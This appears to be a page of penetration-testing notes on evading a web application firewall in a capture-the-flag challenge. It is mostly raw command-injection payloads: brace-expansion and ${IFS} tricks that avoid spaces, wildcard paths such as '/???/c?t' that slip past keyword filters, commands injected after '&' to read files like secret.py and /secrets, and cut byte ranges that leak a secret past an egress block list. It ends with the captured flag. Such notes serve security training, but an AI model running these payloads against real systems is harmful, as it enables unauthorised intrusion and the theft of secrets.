WAF

See Also:

Char Evasion 'spaces'

{ls,-la,/root}
{cat,file.txt}
cat${IFS}file.txt

/&pwd/&pwd
/var/task&{cat,secret.py}

{/var/log/,-la}
/var/log&{cat,yum.log}
/var/log&{ls,//var/log/yum.log}
/&{cat,/var/log/yum.log}
/&{ls,-la,/home/target/}

Found this hiding behind ...  instead of . ..
{/var/task/...,-la}

WAF Wars

  • The bash shell allows wildcards.

  • These can be helpful to run commands that may be blocked by the WAF.

  • There are many functions that can manipulate text.

  • Try looking at the man pages for iconv or cut.

ls -la /secrets

$cmd = "ls -la /secrets" && $output = shell_exec($cmd);
$c=p $m=w $d=d && $output = shell_exec($c$m$d);

ls -la /secrets
/???/?s
/bin/ps

/???/?s /s?????s
"flag","f","l","a","g"
/???/??t 

$egress_ruleset = array("BLAB","{","}",
"flag","secret","password","ssn","confidential");

file
flag
password
pins
ssn

/???/??t ./pins
/???/c?t 
/???/?s         ..ls works
/???/e??o hi    ..echo works!!!
/???/c?t /s?????s/
/u??/???/?s   ..might be 'ls' ?
/u??/???/c?t   ..might be 'cat' ?
/u??/???/c?t -c1  /s????ts/????

Answer:
cut -b8-30

/u??/???/c?t -b1-5  /s????ts/????
/u??/???/c?t -b8-30  /s????ts/????

FLAG{waf_3vision_w1n}
PreviousSQLMapNextWebmin

Last updated